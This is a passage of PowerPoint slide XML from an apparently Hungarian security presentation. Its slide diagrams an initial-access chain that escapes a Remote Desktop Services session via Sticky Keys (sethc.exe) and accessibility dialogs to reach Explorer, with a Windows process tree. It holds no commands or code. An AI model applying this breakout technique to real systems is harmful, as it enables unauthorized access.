              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="2009737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5" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D040D9C8-D96D-5503-9B2E-82BCA3817518}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12379151" y="1139122"/>
                <a:ext cx="1866132" cy="431225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userinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="376" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8003C8D1-0AD3-A35C-B1A3-257A452BE010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="375" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2173535" y="3517779"/>
            <a:ext cx="1107902" cy="1082259"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="399" name="Straight Arrow Connector 398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06EFC38C-9D39-9ACA-6664-C28B6E84E759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="369" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3454059" y="5249951"/>
            <a:ext cx="899962" cy="979671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Kép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2260" y="0"/>
            <a:ext cx="189574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9B2F8-B2DD-77C7-8761-73CEF1426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Rectangle: Rounded Corners 367">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30256F6-7FF7-67C2-2BAD-D6364CF5FF3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3866333" y="1932981"/>
            <a:ext cx="8934954" cy="702988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!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A8B346-CF46-0186-BD44-F7C8F0FCAB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059076" y="851318"/>
            <a:ext cx="14745843" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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23"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>Kezdeti hozzáférés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>RDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri Bold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FBE92D22-3D46-E74D-0437-268C7792F9A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86759" y="1982394"/>
            <a:ext cx="3819965" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>RDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>futtatja az alkalmazást</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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F375406-7656-39D8-9368-732B48C1DA9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598564" y="1956357"/>
            <a:ext cx="3102158" cy="4770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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sticky Keys </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>elindítva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="25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6DB07874-609D-9F29-C10F-9211AA80C4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13137357" y="1950271"/>
            <a:ext cx="3473660" cy="4770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hu-HU" sz="2500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Vezérlőpult -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Group 339">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AFE7984-7DD6-00D6-2B4D-FAB0737B0A20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3933517" y="3463803"/>
            <a:ext cx="4319580" cy="4633355"/>
            <a:chOff x="4562777" y="4712505"/>
            <a:chExt cx="4319580" cy="4633355"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Rectangle: Rounded Corners 338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F93B370-14E3-7015-CC5A-D8093920DD19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4562778" y="5983083"/>
              <a:ext cx="4258032" cy="3362777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3D28A9DA-E99C-7ABD-FFC0-7396DB857449}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4656510" y="4712505"/>
              <a:ext cx="3960514" cy="2698842"/>
              <a:chOff x="5279745" y="3170469"/>
              <a:chExt cx="4500644" cy="2857667"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="254" name="Elbow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7204105D-132C-0BF4-4C3C-B8335CF74ED7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="269" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="5504212" y="5183751"/>
                <a:ext cx="617552" cy="247854"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56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263" name="Elbow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E45E99-BACF-4D61-C8A7-72BA2DDE8938}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="276" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="4590875" y="3859339"/>
                <a:ext cx="1692011" cy="314272"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:tailEnd type="arrow"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="268" name="Group 267">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EBFBBCC-A6EC-C2E2-526B-B0262C4B976D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5936915" y="5193746"/>
                <a:ext cx="3843474" cy="834390"/>
                <a:chOff x="12600383" y="914400"/>
                <a:chExt cx="3843474" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="269" name="Rounded Rectangle 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F3ED8A-60ED-8A8A-9C16-D32212B3C54C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600383" y="1103018"/>
                  <a:ext cx="3781943" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="424D56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9489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SK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70" name="Graphic 269">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B25A1B1-A01F-3AB8-32A8-15066E9C03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  <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="271" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC25E43C-9772-539F-0078-13F55745E148}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341700" y="914400"/>
                  <a:ext cx="3102157" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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1811382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1600" kern="0" dirty="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF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easeofaccessdialog</a:t>
                  </a:r>
                  <a:r>
                    <a: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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>.exe</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp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id="{A5C7CDD4-7848-42CB-421D-BA57AF619E70}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5594016" y="4439773"/>
                <a:ext cx="3145521" cy="834390"/>
                <a:chOff x="12600384" y="914400"/>
                <a:chExt cx="3145521" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="276" name="Rounded Rectangle 27">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629A398C-5999-FADF-BAA9-2F6703A3D63E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600384" y="1103018"/>
                  <a:ext cx="2404204" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:solidFill>
                    <a:srgbClr val="424D56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9489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SK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77" name="Graphic 276">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94B005BB-BD68-C1C1-CBC9-1FC2AC99A8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  <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="278" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F78968D-9A86-2EB8-9041-65A24D40D62C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341701" y="914400"/>
                  <a:ext cx="2404204" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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1811382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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>sethc.exe</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="337" name="Picture 336">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F80436D0-FD45-B809-2215-7B7BE093F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62777" y="7220193"/>
              <a:ext cx="4319580" cy="1900615"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="281" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC923DA-44C6-2BA1-FBEF-2F84961F33D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="307" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="11167914" y="3377741"/>
            <a:ext cx="1078008" cy="998741"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="287" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AF97743-F400-7ABC-1B4C-5EFB12D15100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="297" idx="2"/>
            <a:endCxn id="304" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="12537460" y="3195260"/>
            <a:ext cx="242692" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxn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3AEEAE7D-89A8-0F00-AD3E-8FA79E2BE4D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11821605" y="2631756"/>
            <a:ext cx="1674407" cy="442159"/>
            <a:chOff x="12235531" y="1103021"/>
            <a:chExt cx="1902758" cy="468181"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="297" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73A5F98F-A12C-8F69-A301-6F171820AEAF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235531" y="1103021"/>
              <a:ext cx="1902752" cy="468181"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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8" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1736541E-2F8D-97B9-A4EF-0353F5C1A36A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324819" y="1138273"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wininit.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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A2194B82-E2B6-A238-540B-DD77E512A8A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11821605" y="3316607"/>
            <a:ext cx="1674405" cy="442159"/>
            <a:chOff x="12235548" y="1103021"/>
            <a:chExt cx="1902754" cy="468181"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="304" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1102E04-B3DA-47CC-3A76-4037F5A75E96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235548" y="1103021"/>
              <a:ext cx="1902752" cy="468181"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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5" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014888C5-40CB-C839-AB00-9CD366FE6018}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324834" y="1138273"/>
              <a:ext cx="1813468" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>services.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp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61D8DE8D-253A-5FD4-BDC3-F528A2974CD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8398322" y="4195035"/>
            <a:ext cx="4628245" cy="3552478"/>
            <a:chOff x="8341172" y="4576035"/>
            <a:chExt cx="4628245" cy="3552478"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="347" name="Rectangle: Rounded Corners 346">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9953448D-1A7C-D897-724E-AE49E5EF8CE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8640705" y="6005433"/>
              <a:ext cx="4040032" cy="21230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6" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC35588-40A5-608D-77A6-62FC47ABC706}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="310" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8260051" y="5177194"/>
              <a:ext cx="578176" cy="183132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306" name="Group 305">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C66B60D9-E126-8D12-16CD-658771AF6971}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8341172" y="4576035"/>
              <a:ext cx="2818750" cy="442159"/>
              <a:chOff x="12235544" y="1103018"/>
              <a:chExt cx="3203167" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="307" name="Rounded Rectangle 75">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C55D73E0-9F3F-55C0-FB12-926F09BFC9C1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235544" y="1103018"/>
                <a:ext cx="3192343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8" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8717E18-6415-A602-3ECF-C39069A1C39F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12324833" y="1138270"/>
                <a:ext cx="3113878" cy="413599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svchost.exe –k </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="16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netsvcs</a:t>
                </a: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p:grpSp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93948200-2BF4-F1E1-273D-3784B1D1EABA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8640705" y="5158633"/>
              <a:ext cx="3382212" cy="788015"/>
              <a:chOff x="12600383" y="914400"/>
              <a:chExt cx="3843474" cy="834390"/>
            </a:xfrm>
